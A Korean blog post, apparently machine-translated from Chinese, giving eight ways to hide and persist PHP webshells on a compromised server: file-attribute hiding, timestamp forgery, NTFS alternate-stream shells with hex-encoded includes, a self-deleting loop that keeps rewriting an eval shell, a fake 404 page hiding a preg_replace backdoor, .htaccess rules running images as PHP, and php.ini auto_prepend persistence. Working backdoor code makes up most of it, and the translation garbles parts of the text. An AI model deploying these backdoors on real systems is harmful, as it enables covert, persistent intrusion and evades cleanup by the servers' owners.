1.파일 숨기기
Attrib 사용 +s +a +h +r 명령은 원래 폴더에 시스템 파일 속성, 아카이브 파일 속성, 읽기 전용 파일 속성, 숨겨진 파일 속성을 추가하는 것입니다.
attrib +s +a +h +r shell.php //隐藏shell.php文件2.파일시간속성수정
파일 더미에서 숨기려 할 때자신이 새로 만든 파일을 숨기려면 미혹적인 파일명을 만드는 것 외에 수정 날짜도 수정해야 한다.
//수정 시간 수정Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"//접근 시간 수정Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"//시간 수정 만들기Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"명령으로 파일 속성 가져오기
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force3. ADS를 이용한 파일 내용 숨기기
서버에서 echo 데이터 스트림파일이 들어갑니다. 예를 들어 index.php는 웹 페이지의 정상 파일입니다. 우리는 이렇게 할 수 있습니다
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg그러면 보이지 않는 shell hidden.jpg가 생성되는데, 일반적인 파일 매니저, type 명령, dir 명령, del 명령어에서는 hidden.jpg를 찾을 수 없다.
include 함수를 이용하여 index.php:hidden.jpg를 hex 인코딩하고 이 ADS 파일 include를 넣으면 우리의 문장을 정상적으로 해석할 수 있다
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>4. 불사마
불사마(不死馬)는 자신을 삭제하고 프로세스의 형태로 순환해 숨겨진 뒷문을 만든다
<?phpset_time_limit(0); ignore_user_abort(1); unlink(__FILE__); //자신 삭제while(1){ file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //창건shell.php,여기서는 무살처분이라는 말을 쓰는 것이 가장 좋다 sleep(10); //시간 간격을 두다}?>가장 쉽고 효율적인 방법으로 서비스를 재개하면 웹쉘 파일을 삭제할 수 있다.
5. 미들웨어 백도어
컴파일된 so 파일을 modules 폴더에 복사, 백도어 모듈 부팅, Apac 재시작he.특정 인삼을 보낼 때숫자의 문자열이 지나면 백도어가 트리거됩니다.
깃허브 프로젝트 주소:
https://github.com/VladRico/apache2_BackdoorMod6,404페이지를 이용하여 뒷문 숨기기
404 페이지는 주로 사용자 체질을 향상시키는 데 사용됩니다.검사, 백도어 파일을 숨길 수 있습니다.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>7,.htaccess 파일을 이용하여 PHP 백도어 구성
일반적으로.htaccess는 뒷문을 남기는 것과 블랙리스트에 대해 우회하는 데 사용될 수 있다.업로드 디렉터리에서 .htaccess 파일을 작성하면 다시 시작하지 않고 png 파일을 업로드할 수 있습니다
AddType application/x-httpd-php .png또.htaccess에 php 해석 규칙을 넣어 파일명 포함 1을 php로 해석하고 1.txt를 업로드하면 해석할 수 있다
<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>8. php.ini를 이용한 백도어 파일 숨기기
php.ini에서 마스터를 실행하기 전에 지정할 수 있습니다자동으로 해석되는 파일명은 페이지의 공용 머리와 꼬리에 사용되며 php 백도어를 숨기는 용도로도 쓰인다\
;PHP 문서 이전에 자동으로 파일 추가하기。auto_prepend_file = "c:\tmp.txt";PHP 문서 다음에 자동으로 파일 추가하기。auto_prepend_file = "c:\tmp.txt"서비스를 재개하려면 어느 하나의 php파일에 접속하면 webshell을 얻을 수 있습니다.
'개발 꿀팁 > PHP' 카테고리의 다른 글
| phphttp가 get, post 요청을 보내는 몇 가지 방법 (0) | 2022.07.06 |
|---|---|
| php가 문자열에 지정된 문자열이 포함되어 있는지 여부를 판단하는 몇 가지 방법 (0) | 2022.07.06 |
| php PDO 접속 가능 여부 판단 방법 (0) | 2022.07.06 |
| php redis list 1회용 lPush 복수값 (0) | 2022.07.06 |
| PHP가 난수를 생성하는 몇 가지 방법 (0) | 2022.07.06 |